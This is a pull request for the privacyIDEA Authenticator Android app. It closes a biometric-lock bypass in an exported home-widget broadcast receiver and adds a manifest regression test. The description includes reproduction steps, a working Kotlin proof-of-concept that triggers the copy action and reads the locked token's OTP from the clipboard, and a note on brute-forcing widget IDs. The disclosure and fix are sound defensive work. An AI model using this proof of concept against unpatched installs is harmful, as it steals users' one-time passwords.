### PR TITLE
Fix biometric lock bypass in Android home-widget OTP copy action

### DIFF
--- a/android/app/src/main/AndroidManifest.xml
+++ b/android/app/src/main/AndroidManifest.xml
@@ -86,7 +86,7 @@
 
         <receiver
             android:name="es.antonborri.home_widget.HomeWidgetBackgroundReceiver"
-            android:exported="true">
+            android:exported="false">
             <intent-filter>
                 <action android:name="es.antonborri.home_widget.action.BACKGROUND" />
             </intent-filter>

--- a/lib/utils/home_widget_utils.dart
+++ b/lib/utils/home_widget_utils.dart
@@ -437,6 +437,10 @@ class HomeWidgetUtils {
       await unlink(widgetId);
       return;
     }
+    if (token.isLocked) {
+      Logger.info('Copy blocked because the token is locked');
+      return;
+    }
 
     HomeWidget.saveWidgetData('$keyCopyBlocked$widgetId', true);
 

--- a/test/unit_test/android/home_widget_manifest_security_test.dart
+++ b/test/unit_test/android/home_widget_manifest_security_test.dart
@@ -1,0 +1,35 @@
+/*
+ * privacyIDEA Authenticator
+ *
+ * Copyright (c) 2026 NetKnights GmbH
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+import 'dart:io';
+
+import 'package:flutter_test/flutter_test.dart';
+
+void main() {
+  test('home widget background receiver is private to the app', () {
+    final manifest = File(
+      'android/app/src/main/AndroidManifest.xml',
+    ).readAsStringSync();
+    final declaration = RegExp(
+      r'<receiver\s+android:name="es\.antonborri\.home_widget\.HomeWidgetBackgroundReceiver"\s+android:exported="([^"]+)"',
+    ).firstMatch(manifest);
+
+    expect(declaration, isNotNull);
+    expect(declaration!.group(1), 'false');
+  });
+}


### PR DESCRIPTION
# Fix biometric lock bypass in Android home-widget OTP copy action

## Summary

The Android home-widget background receiver is currently exported and accepts
an intent URI that selects a widget action. An unrelated application can send
an explicit broadcast for the `copy` action. The callback then resolves the
token linked to the supplied widget ID and copies its current OTP without
checking whether the token is locked.

This change:

- makes `HomeWidgetBackgroundReceiver` private to the application; and
- rejects `copyOtp()` when the linked token is locked as defense in depth.

Normal widget interaction continues to work because its immutable
`PendingIntent` is created by the application itself.

## Impact

An unprivileged application installed on the same Android device can bypass
the token authentication gate for a TOTP token linked to a home widget. It can
ask the Authenticator to place the current OTP in the system clipboard and,
while running in the foreground, read that value. The attacking application
does not need an Android permission.

For this callback path, the biometric requirement is effectively decorative:
the OTP of a locked token can be copied without satisfying biometric or other
configured authentication.

This affects OTP access through the Android widget. It does not expose a Push
private key.

## Reproduction

1. Enroll a TOTP token, enable its authentication requirement, and link it to
   an Android home widget.
2. Confirm that the token is locked and that the application requests
   authentication before displaying its OTP.
3. From an unrelated application, send an explicit broadcast to
   `es.antonborri.home_widget.HomeWidgetBackgroundReceiver` using action
   `es.antonborri.home_widget.action.BACKGROUND` and URI
   `homewidget://copy?widgetId=<linked-widget-id>`.
4. Read the clipboard from the attacking application while it is in the
   foreground.

Before the fix, the clipboard contains the current OTP for the locked token.

The following minimal Android activity demonstrates the relevant operation.
It requires no `<uses-permission>` declaration. For a debug build, replace the
target package with `it.netknights.piauthenticator.debug`.

```kotlin
class MainActivity : Activity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)

        val copyIntent = Intent(
            "es.antonborri.home_widget.action.BACKGROUND",
        ).apply {
            component = ComponentName(
                "it.netknights.piauthenticator",
                "es.antonborri.home_widget.HomeWidgetBackgroundReceiver",
            )
            data = Uri.parse("homewidget://copy?widgetId=2")
        }

        sendBroadcast(copyIntent)

        Handler(Looper.getMainLooper()).postDelayed({
            val clipboard = getSystemService(ClipboardManager::class.java)
            val copiedValue = clipboard.primaryClip
                ?.getItemAt(0)
                ?.coerceToText(this)
            Log.i("WidgetOtpPoc", "clipboard=$copiedValue")
        }, 1500)
    }
}
```

For a controlled reproduction, the linked widget ID can be obtained from
`adb shell dumpsys appwidget`. A malicious application does not need that
privilege: it can try the small integer widget-ID space while its activity is
in the foreground and observe whether the clipboard changes.

## Validation

- A manifest regression test fails before the change and passes afterward.
- The issue was reproduced with a no-permission proof-of-concept application
  on an Android 15 emulator.
- After the change, the same broadcast does not reach the receiver and the
  clipboard remains unchanged.
- Legitimate `show` and `copy` actions invoked from the installed home widget
  still reach the background callback.
- Focused Flutter tests and static analysis pass.
